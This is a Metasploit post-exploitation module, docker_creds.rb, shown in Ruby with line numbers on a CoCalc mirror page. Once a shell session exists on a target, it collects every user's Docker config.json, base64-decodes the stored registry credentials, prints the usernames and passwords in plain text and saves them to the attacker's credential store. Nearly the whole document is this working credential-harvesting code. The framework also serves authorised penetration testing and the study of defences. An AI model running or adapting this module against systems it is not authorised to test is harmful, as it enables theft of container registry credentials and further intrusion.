Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/multi/gather/docker_creds.rb
19515 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'json'
7
8
class MetasploitModule < Msf::Post
9
include Msf::Post::File
10
include Msf::Post::Unix
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'Multi Gather Docker Credentials Collection',
17
'Description' => %q{
18
This module will collect the contents of all users' .docker directories on the targeted
19
machine. If the user has already push to docker hub, chances are that the password was
20
saved in base64 (default behavior).
21
},
22
'License' => MSF_LICENSE,
23
'Author' => ['Flibustier'],
24
'Platform' => %w[bsd linux osx unix],
25
'SessionTypes' => ['shell'],
26
'Notes' => {
27
'Stability' => [CRASH_SAFE],
28
'SideEffects' => [],
29
'Reliability' => []
30
}
31
)
32
)
33
end
34
35
# This module is largely based on gpg_creds.rb.
36
37
def run
38
print_status('Finding .docker directories')
39
paths = enum_user_directories.map { |d| d + '/.docker' }
40
# Array#select! is only in 1.9
41
paths = paths.select { |d| directory?(d) }
42
43
if paths.nil? || paths.empty?
44
print_error('No users found with a .docker directory')
45
return
46
end
47
48
download_loot(paths)
49
end
50
51
def download_loot(paths)
52
print_status("Looting #{paths.count} directories")
53
paths.each do |path|
54
path.chomp!
55
file = 'config.json'
56
target = "#{path}/#{file}"
57
58
if file? target
59
print_status("Downloading #{target} -> #{file}")
60
extract(target)
61
end
62
end
63
end
64
65
def extract(target)
66
file = read_file(target)
67
parsed = JSON.parse(file)
68
if parsed['auths']
69
parsed['auths'].each do |key, value|
70
vprint_status("key: #{key}")
71
value.each do |k, v|
72
next unless k == 'auth'
73
74
plain = Rex::Text.decode_base64(v)
75
next unless plain.include? ':'
76
77
print_good("Found #{plain}")
78
username, password = plain.split(':')
79
credential_data = {
80
origin_type: :import,
81
module_fullname: fullname,
82
filename: target,
83
workspace_id: myworkspace_id,
84
service_name: 'docker',
85
realm_value: key,
86
realm_key: Metasploit::Model::Realm::Key::WILDCARD,
87
private_type: :password,
88
private_data: password,
89
username: username
90
}
91
create_credential(credential_data)
92
93
print_good('Saved credentials')
94
end
95
end
96
else
97
print_status('No credentials found in config file')
98
end
99
end
100
end
101
102